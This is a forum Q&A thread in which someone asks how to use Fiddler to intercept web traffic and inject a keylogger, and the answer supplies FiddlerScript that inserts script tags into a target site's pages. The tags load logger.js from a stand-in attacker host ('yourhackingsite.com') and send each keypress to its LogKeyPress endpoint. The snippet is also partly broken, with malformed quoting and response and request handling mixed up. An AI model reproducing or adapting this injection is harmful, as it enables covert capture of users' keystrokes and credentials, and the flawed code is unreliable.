# Intercept web traffic using Fiddler and add a keylogger function

Tags: keyloggers, tls-intercept

Can we intercept the web traffic using Fiddler and inject a functionality such as key logger before the request being made to the server ?

Comment: Do you want to log all keyboard interactions with the website?

Comment: Yes. I need to log all keyboard interactions

Answer (score 1):

Yes you can do this.

First of all you need to add the fiddler extension called [Fiddler script](http://www.telerik.com/download/fiddler/fiddlerscript-editor).  This allows you to handle Fiddler events such as OnBeforeRequest, OnBeforeResponse etc..

Since you need to intercept the traffic on request, you need to intercept the OnBeforeRequest event.

Following is a sample code that you can use to achieve this using fiddler script. Please note that you will not be able to achieve exactly what you need from this script , but use it as a startup and modify according to your need.

```
if (oSession.HostnameIs("www.yourtargetsite.com") && oSession.HTTPMethodIs("POST")) // or what ever your web method
{   
    oSession.utilDecodeResponse();
    var body = System.Text.Encoding.UTF8GetString(oSession.responseBodyBytes); // grab the request body here

    var logger = '<script src="http://yourhackingsite.com/logger.js"></script>';
    logger += '<script>destination=http://yourhackingsite.com/LogKeyPress?key=";</script>';

    body = body.replace("<head>",logger + "</head>");
    oSession.utilDecodeResponseBody(body); // inject your custom altered body   
}
```